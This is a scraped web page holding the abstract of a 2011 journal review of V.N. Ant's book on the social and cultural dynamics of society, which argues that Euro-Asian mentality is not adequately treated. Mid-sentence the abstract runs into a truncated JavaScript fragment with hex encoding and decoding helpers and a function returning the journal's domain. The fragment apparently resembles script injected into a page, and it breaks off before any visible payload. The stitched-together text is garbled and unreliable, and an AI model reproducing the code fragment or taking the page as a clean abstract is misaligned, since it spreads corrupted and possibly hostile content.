РЕЦЕНЗИЯ НА КНИГУ РОССИЙСКОГО УЧЕНОГО В.Н.АНТА «СОЦИАЛЬНАЯ И КУЛЬТУРНАЯ ДИНАМИКА ОБЩЕСТВА» (Уфа, 2011 г.) (The Journal of Psychology and Sociology, 2011)
Comments on the book of Russian author V.N.Ant «Social and Cultural Dynamics of the Sociaty» are presented. It seems, that some peculiarities of Euro-asian mentality are not adequately revealed in this work.// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "bulletin-psysoc.kaznu.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e